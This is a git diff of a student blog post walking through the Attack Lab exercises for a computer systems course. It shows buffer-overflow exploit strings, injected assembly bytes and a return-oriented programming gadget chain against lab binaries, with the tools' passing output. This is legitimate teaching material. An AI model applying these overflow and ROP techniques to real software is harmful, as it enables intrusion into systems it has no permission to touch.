diff options
Diffstat (limited to 'Content/posts/2023-10-05-attack-lab.md')
-rw-r--r-- | Content/posts/2023-10-05-attack-lab.md | 150 |
1 files changed, 137 insertions, 13 deletions
diff --git a/Content/posts/2023-10-05-attack-lab.md b/Content/posts/2023-10-05-attack-lab.md index 1f87aca..bd92f0e 100644 --- a/Content/posts/2023-10-05-attack-lab.md +++ b/Content/posts/2023-10-05-attack-lab.md @@ -1,6 +1,6 @@ --- date: 2023-10-05 20:01 -description: Walkthrough of Attack Lab Phases 1-3 for CSCI 2400 Computer Systems +description: Walkthrough of Attack Lab Phases 1-4 for CSCI 2400 Computer Systems tags: gdb, reverse-engineering, c++, csci2400, assembly draft: false --- @@ -42,14 +42,14 @@ We can see that `0x18` (hex) or `24` (decimal) bytes of buffer is allocated to ` Now, since we know the buffer size we can try passing the address of the touch1 function. -``` +```bash jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1 000000000040261e <touch1>: ``` We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check: -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)' little ``` @@ -63,7 +63,7 @@ We have our padding size and the function we need to call, we can write it in `c 1e 26 40 00 00 00 00 00 ``` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch1!: You called touch1() @@ -100,14 +100,14 @@ however, you must make it appear to touch2 as if you have passed your cookie as This hint tells us that we need to store the cookie in the rdi register -``` +```asm movq $0x3e8dee8f,%rdi retq ``` To get the byte representation, we need to compile the code and then disassemble it. -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o phase2.s: Assembler messages: phase2.s: Warning: end of file not at end of a line; newline inserted @@ -140,7 +140,7 @@ We need to find the address of `%rsp` after calling `<Gets>` and sending a reall What we are going to do now is to add a break on `getbuf`, and run the program just after it asks us to enter a string and then find the address of `%rsp` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1 Copyright (C) 2022 Free Software Foundation, Inc. @@ -197,7 +197,7 @@ address of touch2 function To get the address of `touch2` we can run: -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2 000000000040264e <touch2>: 402666: 74 2a je 402692 <touch2+0x44> @@ -214,7 +214,7 @@ jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep to Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes, -``` +```bash joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch2!: You called touch2(0x3e8dee8f) @@ -238,8 +238,13 @@ where you place the string representation of your cookie. Because `hexmatch` and `strncmp` might overwrite the buffer allocated for `getbuf` we will try to store the data after the function `touch3` itself. +The rationale is simple: by the time our payload is executed, we will be setting `%rdi` to point to the cookie. Placing the cookie after `touch3` function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets. + => The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex) +* Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the `touch3` function) +* Touch 3 (8 bytes): The address of the `touch3` function is 8 bytes long. + We can use our address for `%rsp` from phase 2, and simply add `0x28` to it. => `0x55621b40` + `0x28` = `0x55621B68` @@ -251,7 +256,7 @@ movq $0x55621B68, %rdi retq ``` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o phase3.s: Assembler messages: phase3.s: Warning: end of file not at end of a line; newline inserted @@ -278,7 +283,7 @@ cookie string To quickly get the address for `touch3` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3 0000000000402763 <touch3>: 402781: 74 2d je 4027b0 <touch3+0x4d> @@ -287,7 +292,7 @@ jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep to We need to use an ASCII to Hex converter to convert the cookie string into hex. -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p 3365386465653866 ``` @@ -303,7 +308,8 @@ Thus, our cookie string representation is `33 65 38 64 65 65 38 66` 33 65 38 64 65 65 38 66 ``` -``` + +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch3!: You called touch3("3e8dee8f") @@ -313,3 +319,121 @@ NICE JOB! ``` Phases 1-3 Complete. + +## Phase 4 + +> For Phase 4, you will repeat the attack of Phase 2, but do so on program RTARGET using gadgets from your +gadget farm. You can construct your solution using gadgets consisting of the following instruction types, +and using only the first eight x86-64 registers (%rax–%rdi). +* movq +* popq +* ret +* nop + +> All the gadgets you need can be found in the region of the code for rtarget demarcated by the +functions start_farm and mid_farm + +> You can do this attack with just two gadgets + +> When a gadget uses a popq instruction, it will pop data from the stack. As a result, your exploit +string will contain a combination of gadget addresses and data. + +Let us check if we can find `popq %rdi` between `start_farm` and `end_farm` + +The way a normal person would find the hex representation `58` to be between `start_farm` and `end_farm` is to find the line numbers for both and +then search between those lines. But, what if you don't want to move away from the terminal? + +Assuming, the disassembled code for `rtarget` is stored in `dis2.txt` (`objdump -d rtarget > dis2.txt`) + +``` +jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 " 58" +16-000000000040281f <getval_373>: +17- 40281f: f3 0f 1e fa endbr64 +18: 402823: b8 d3 f5 c2 58 mov $0x58c2f5d3,%eax +19- 402828: c3 ret +20- +-- +26-0000000000402834 <setval_212>: +27- 402834: f3 0f 1e fa endbr64 +28: 402838: c7 07 58 90 c3 92 movl $0x92c39058,(%rdi) +29- 40283e: c3 ret +30- +-- +41-0000000000402854 <setval_479>: +42- 402854: f3 0f 1e fa endbr64 +43: 402858: c7 07 58 c7 7f 61 movl $0x617fc758,(%rdi) +44- 40285e: c3 ret +45- +``` + +If we were to pick the first one as our gadget, the instruction address is `0x402823`, but to get to the instruction `58` we need to add 4 bytes: + +`=> Gadget address = 0x402823 + 0x4 = 0x402827` + +The PDF already provides the next gadget we are supposed to look for `48 89 c7` + +``` +jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 "48 89 c7" +11-0000000000402814 <setval_253>: +12- 402814: f3 0f 1e fa endbr64 +13: 402818: c7 07 48 89 c7 94 movl $0x94c78948,(%rdi) +14- 40281e: c3 ret +15- +-- +31-000000000040283f <getval_424>: +32- 40283f: f3 0f 1e fa endbr64 +33: 402843: b8 48 89 c7 c3 mov $0xc3c78948,%eax +34- 402848: c3 ret +35- +36-0000000000402849 <setval_417>: +37- 402849: f3 0f 1e fa endbr64 +38: 40284d: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi) +39- 402853: c3 ret +40- +jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ +``` + +We cannot use the first match because it is followed by `0x94` instead of `c3`, either of the next two matches will work (`0x90` is `nop` and it does nothing but increment the program counter by 1) + +Again, we have to account for the offset. + +Taking `0x402843` we need to add just 1 byte. + +`=> 0x402843 + 1 = 0x402844` + + +Our answer for this file is going to be: + +``` +padding +gadget1 +cookie +gadget2 +touch2 +``` + +```bash +jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ cat dis2.txt | grep touch2 +000000000040264e <touch2>: + 402666: 74 2a je 402692 <touch2+0x44> + 4026b2: eb d4 jmp 402688 <touch2+0x3a> +``` + +``` +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +27 28 40 00 00 00 00 00 +8f ee 8d 3e 00 00 00 00 +44 28 40 00 00 00 00 00 +4e 26 40 00 00 00 00 00 +``` + +```shell +jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ ./hex2raw < ./rtarget.l2.txt | ./rtarget +Cookie: 0x3e8dee8f +Type string:Touch2!: You called touch2(0x3e8dee8f) +Valid solution for level 2 with target rtarget +PASS: Sent exploit string to server to be validated. +NICE JOB! +``` |